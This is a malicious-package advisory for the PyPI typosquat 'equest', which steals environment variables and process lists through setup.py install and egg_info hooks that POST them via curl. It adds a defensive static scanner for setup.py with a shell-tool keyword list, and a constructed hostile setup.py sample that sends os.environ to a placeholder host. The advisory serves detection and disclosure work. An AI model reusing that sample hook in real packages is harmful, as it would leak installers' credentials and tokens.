MAL-2026-6289
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094)
The package name equest is a one-character deletion of the widely-used requests package and ships no functional library code. setup.py registers custom install and egg_info cmdclasses so that on pip install or pip download (egg_info runs during pip's metadata resolution, so the hook fires before any install step), the package collects the full process environment (os.environ serialized as key=value pairs) and the output of ps -elf, then POSTs both to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun via curl over plaintext HTTP. The destination is an Interactsh (oast.fun) collector subdomain controlled by the publisher. Any CI/build secrets present in the installer's environment at install time (cloud credentials, registry tokens, GitHub tokens, database credentials) are leaked to the attacker, and the running process list reveals additional host context. The README self-describes the package as a proof-of-concept of arbitrary code execution via pip install.
Source: kam193 (293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1)
During installation, the package exfiltrates environment variables.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-ip-rotat
Reasons (based on the campaign):
- The package overrides the install command in setup.py to execute malicious code during installation.
- exfiltration-env-variables
- typosquatting
- CWE-506 - The product contains code that appears to be malicious in nature.
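The cmdclass technique described in the amazon-inspector entry above (and summarised in the "overrides the install command" reason) is easy to triage statically before a build ever runs. The script below is an added example, not code from the advisory, from the package, or from either reporter: it parses a setup.py with Python's ast module, lists every cmdclass override passed to setup(), and inspects each overriding class, following calls into module-level helpers in the same file, for environment reads, process execution, network calls, embedded URLs and shell tools. The two setup.py inputs are constructed here; the malicious one mirrors the behaviour the advisory describes (install and egg_info hooks, os.environ serialised, ps -elf, curl POST) but uses the placeholder host collector.example rather than the page's IOC domain. One caveat for reproduction: setuptools hooks run only when pip works from the sdist, so a compatible wheel such as the py3-none-any file listed in the integrity data is installed without executing setup.py; point this scanner at the .tar.gz.

```python
"""Static triage of a PyPI sdist's setup.py for install-time hooks (added example)."""
import ast

# setuptools commands pip runs without the user asking for them: egg_info/dist_info
# during metadata resolution (even for `pip download`), build_* and bdist_wheel when
# building, install when installing from an sdist.
IMPLICIT_COMMANDS = {"install", "egg_info", "dist_info", "develop", "build",
                     "build_py", "build_ext", "bdist_wheel", "sdist"}
EXEC_PREFIXES = ("subprocess.", "os.system", "os.popen", "os.exec", "os.spawn")
EXEC_NAMES = {"Popen", "call", "check_call", "check_output", "getoutput", "system", "popen"}
NET_PREFIXES = ("urllib.", "requests.", "http.client", "socket.")
NET_NAMES = {"urlopen", "create_connection"}
SHELL_TOOLS = {"curl", "wget", "nc", "ncat", "ps", "sh", "bash"}


def _dotted(node):
    """Dotted name for Name/Attribute chains, e.g. 'subprocess.run'; '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def find_cmdclass_overrides(tree):
    """Return {command: class_name} from the cmdclass={...} keyword of setup()."""
    overrides = {}
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _dotted(node.func) in ("setup", "setuptools.setup")):
            continue
        for kw in node.keywords:
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                for key, val in zip(kw.value.keys, kw.value.values):
                    if isinstance(key, ast.Constant) and isinstance(key.value, str):
                        overrides[key.value] = _dotted(val)
    return overrides


def _collect(node, helpers, seen, findings):
    """Record suspicious behaviour under `node`, following calls into same-file helpers."""
    for sub in ast.walk(node):
        if isinstance(sub, (ast.Name, ast.Attribute)):
            name = _dotted(sub)
            if name in ("os.environ", "environ") or name.startswith("os.environ."):
                findings.add("reads-environment")
        elif isinstance(sub, ast.Call):
            fn = _dotted(sub.func)
            if fn.startswith(EXEC_PREFIXES) or fn in EXEC_NAMES:
                findings.add("exec:" + fn)
            if fn.startswith(NET_PREFIXES) or fn in NET_NAMES:
                findings.add("net:" + fn)
            if fn in helpers and fn not in seen:  # hop into a module-level helper, once
                seen.add(fn)
                _collect(helpers[fn], helpers, seen, findings)
        elif isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            words = sub.value.split()
            findings.update("url:" + w for w in words if w.startswith(("http://", "https://")))
            if words and words[0] in SHELL_TOOLS:
                findings.add("tool:" + words[0])


def triage_setup_py(source):
    """Return {command: {'class', 'implicit', 'findings'}} for every cmdclass override."""
    tree = ast.parse(source)
    helpers = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    classes = {n.name: n for n in tree.body if isinstance(n, ast.ClassDef)}
    report = {}
    for cmd, cls in find_cmdclass_overrides(tree).items():
        findings = set()
        if cls in classes:
            _collect(classes[cls], helpers, set(), findings)
        report[cmd] = {"class": cls, "implicit": cmd in IMPLICIT_COMMANDS,
                       "findings": sorted(findings)}
    return report


def is_suspicious(report):
    """True when a hook pip runs on its own both reads the environment and has an egress path."""
    for entry in report.values():
        f = entry["findings"]
        egress = any(x.startswith(("url:", "net:", "tool:curl", "tool:wget", "tool:nc")) for x in f)
        if entry["implicit"] and "reads-environment" in f and egress:
            return True
    return False


# Constructed sample mirroring the advisory's description; collector.example is a placeholder.
MALICIOUS_SETUP_PY = r'''
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
import os, subprocess

def _beacon():
    env = "\n".join(f"{k}={v}" for k, v in os.environ.items())
    procs = subprocess.check_output(["ps", "-elf"]).decode()
    subprocess.run(["curl", "-s", "-X", "POST", "--data-binary", "@-",
                    "http://collector.example/"], input=(env + procs).encode())

class Install(install):
    def run(self):
        _beacon()
        install.run(self)

class EggInfo(egg_info):
    def run(self):
        _beacon()
        egg_info.run(self)

setup(name="equest", version="0.0.1", cmdclass={"install": Install, "egg_info": EggInfo})
'''

# Constructed benign comparison: a cmdclass override that only customises the build step.
BENIGN_SETUP_PY = '''
from setuptools import setup
from setuptools.command.build_py import build_py

class BuildPy(build_py):
    def run(self):
        self.announce("generating version module")
        build_py.run(self)

setup(name="example", version="1.0", cmdclass={"build_py": BuildPy})
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        rep = triage_setup_py(src)
        print(label, "->", "suspicious" if is_suspicious(rep) else "clean")
        for cmd, entry in rep.items():
            print(f"  cmdclass[{cmd!r}] = {entry['class']}: {entry['findings']}")
```

The verdict deliberately requires both an environment read and an egress indicator in a hook pip triggers implicitly: a build_py override that reads an environment flag and shells out to a compiler is common and benign, whereas environment serialisation next to a URL or curl in egg_info has no legitimate packaging purpose. Helpers are followed one hop because install-time stealers routinely move the payload out of the command class into a module-level function; obfuscated or dynamically built strings will still evade this and need a sandboxed build with egress blocked.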
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "setup.py",
"sha256": "8bc5d48164d98e2402425cd2bbde0c572dc087fff7dce610665f8aae944a3fc1",
"tlsh": "1f315e07e0bf29291ac354a0558f03959bc0e3a32b6431fab2fc29191f0a129103b8af"
},
{
"path": "PKG-INFO",
"sha256": "9966ff2a0a7599ad6d8ca74949977a50f579f49a5138e4e331b9e55dd8e4d32c",
"tlsh": "0ba024147c30443345f505053c1403350370530c345f4c3c50150f004750054d0dc071"
}
],
"package_integrity": [
{
"filename": "equest-0.0.1-py3-none-any.whl",
"hashes": {
"blake2b_256": "d6c1e286eeba2c76b9aba625730c1902ba74d72c71a7b0b4ed05f2b70b90088c",
"md5": "c61a05ffa3b6b55df1ddbc3fb7c4ab5b",
"sha256": "a0fa76f33b41ae3d1b1d0ba0954a0881222bc3330ba4e12405bcc34fd4b3e32e"
}
},
{
"filename": "equest-0.0.1.tar.gz",
"hashes": {
"blake2b_256": "18be4ac8c7376cc802cc362475833ae270f98eac334f7a15f57de9a6ca0dc8b6",
"md5": "86eb9ea08ebe6e4f2a3363de45663136",
"sha256": "1673a0ce03f6867e139a0a182bf09078d9fc0c5a124ab9c36843f65dad5db47f"
}
}
]
}
},
"package": {
"ecosystem": "PyPI",
"name": "equest"
},
"versions": [
"0.0.1"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/kam193",
"https://bad-packages.kam193.eu/"
],
"name": "Kamil Ma\u0144kowski (kam193)",
"type": "REPORTER"
}
],
"database_specific": {
"iocs": {
"domains": [
"gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-06-ip-rotat/equest",
"import_time": "2026-06-23T13:28:20.413460091Z",
"modified_time": "2026-06-23T12:07:23.994682Z",
"sha256": "2bb3fce5427fc5a0a72380cf59e8396bf3409ceaead44f6a2df757f125b6e287",
"source": "kam193",
"versions": [
"0.0.1"
]
},
{
"id": "IN-MAL-2026-007333",
"import_time": "2026-06-23T19:40:40.094438157Z",
"modified_time": "2026-06-23T18:57:43Z",
"sha256": "cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094",
"source": "amazon-inspector",
"versions": [
"0.0.1"
]
},
{
"id": "pypi/2026-06-ip-rotat/equest",
"import_time": "2026-06-24T07:47:34.500747878Z",
"modified_time": "2026-06-23T12:07:23.994682Z",
"sha256": "293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1",
"source": "kam193",
"versions": [
"0.0.1"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094)\nThe package name `equest` is a one-character deletion of the widely-used `requests` package and ships no functional library code. setup.py registers custom install and egg_info cmdclasses so that on `pip install` or `pip download`, the package collects the full process environment (`os.environ` serialized as `key=value` pairs) and the output of `ps -elf`, then POSTs both to `http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun` via curl over plaintext HTTP. The destination is an Interactsh (oast.fun) collector subdomain controlled by the publisher. Any CI/build secrets present in the installer\u0027s environment at install time (cloud credentials, registry tokens, GitHub tokens, database credentials) are leaked to the attacker, and the running process list reveals additional host context. The README self-describes the package as a proof-of-concept of arbitrary code execution via `pip install`.\n\n## Source: kam193 (293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1)\nDuring installation, the package exfiltrates env variables\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-ip-rotat\n\n\nReasons (based on the campaign):\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - exfiltration-env-variables\n\n\n - typosquatting\n",
"id": "MAL-2026-6289",
"modified": "2026-06-24T07:49:20Z",
"published": "2026-06-23T12:07:23Z",
"references": [
{
"type": "WEB",
"url": "https://bad-packages.kam193.eu/pypi/package/equest"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/equest/0.0.1/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in equest (PyPI)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.